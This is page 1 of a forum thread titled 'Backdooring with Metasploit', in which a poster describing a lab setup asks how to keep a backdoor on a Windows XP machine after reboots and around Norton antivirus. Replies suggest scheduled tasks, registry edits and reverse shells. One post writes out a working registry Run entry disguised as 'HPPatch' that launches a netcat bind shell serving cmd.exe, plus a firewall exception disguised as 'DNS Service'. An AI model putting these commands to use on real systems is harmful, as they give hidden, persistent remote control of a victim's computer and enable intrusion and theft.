Page 1 of 2 12 LastLast
Results 1 to 10 of 17

Thread: Backdooring with Metasploit

  1. #1
    Junior Member
    Join Date
    Feb 2007
    Posts
    74

    Default Backdooring with Metasploit

    Is there any accurate way to maintain backdoor access to a computer in the case that it is rebooted? I have a lab environment setup with Windows XP and BT3, I also have Norton AntiVirus on the XP Box, when I try to upload nc.exe to the XP Box Norton Picks it up as a Virus and thus it deletes / moves it to quarantine on the spot. Is there any way around Norton and does netcat allow any form of backdoor access to be maintained in the event a computer is rebooted?

    I was thinking something along the lines of using psexec and scheduling it to run with schtasks at startup and then having psexec use netcat to forward a port to run on, would this work?

  2. #2

  3. #3
    Junior Member
    Join Date
    Feb 2007
    Posts
    74

    Default

    Worked perfectly! Thanks for the link. So now can I just schedule nc to run in the event that the computer shutsdown using schtask?

  4. #4
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    As long as the system is XP Prof yes, XP Home doesn't have schtask.
    Tiocfaidh ár lá

  5. #5
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    speaking of windows at command
    http://rmccurdy.com/scripts/RUNAS_SYSTEM.vbs

    what you want is a reverse shell backdoors dont really do any good anymore with firewalls etc ..

  6. #6
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by aspekt9 View Post
    Worked perfectly! Thanks for the link. So now can I just schedule nc to run in the event that the computer shutsdown using schtask?
    Why not modifying the registry?

  7. #7
    Junior Member
    Join Date
    Feb 2007
    Posts
    74

    Default

    Quote Originally Posted by kazalku View Post
    Why not modifying the registry?
    This was what I eventually went with:

    Code:
    REGEDIT4
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    "HPPatch"="C:\Windows\system32\inetpub\nc.exe -l -L -p 5555 -d -t -e cmd.exe"
    Works like a charm, starts up on reboot and everything. I had to use CURRENT_USER, LOCAL_MACHINE wasn't allowing me to edit the registry remotely for some reason. I did have to modify the firewall settings, for that I used:

    Code:
    netsh firewall add allowedprogram C:\Windows\system32\inetpub\nc.exe "DNS Service" ENABLE
    Everything is good to go from there and seems to be working properly. However, whenever I telnet to the system I get double bashes i.e.:

    Code:
    C:\windows\system32\inetpub>
    C:\windows\system32\inetpub>dir 
    
    ..... directory info here ......
    
    C:\windows\system32\inetpub>
    C:\windows\system32\inetpub>
    Any idea why this occurs? It only does it if I telnet, not if I use netcat to connect.

  8. #8
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by aspekt9 View Post
    I had to use CURRENT_USER, LOCAL_MACHINE wasn't allowing me to edit the registry remotely for some reason.
    You need to have admin access to do that. Use
    Code:
    net localgroup administrators
    to find out whether current user is in admin group or not.

    However, whenever I telnet to the system I get double bashes i.e.:

    Code:
    C:\windows\system32\inetpub>
    C:\windows\system32\inetpub>dir 
    
    ..... directory info here ......
    
    C:\windows\system32\inetpub>
    C:\windows\system32\inetpub>
    Any idea why this occurs? It only does it if I telnet, not if I use netcat to connect.
    I don't know...... I don't have to know everything...

  9. #9
    Junior Member
    Join Date
    Feb 2007
    Posts
    74

    Default

    Hah, thanks. Also, the user is an Administrator so I don't understand why it wouldn't let me write to it. It didn't give me an error and when I had the registry opened it looked like it refreshed but nothing was updated. Also, if I open the reg file on the physical computer, it inserts into the registry fine.

  10. #10
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by aspekt9 View Post
    Hah, thanks. Also, the user is an Administrator so I don't understand why it wouldn't let me write to it. It didn't give me an error and when I had the registry opened it looked like it refreshed but nothing was updated. Also, if I open the reg file on the physical computer, it inserts into the registry fine.
    Can you modify it locally? Just to check that registry is not locked by third party software...

    Hahh, you just added the last line...... phew........ no idea...

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •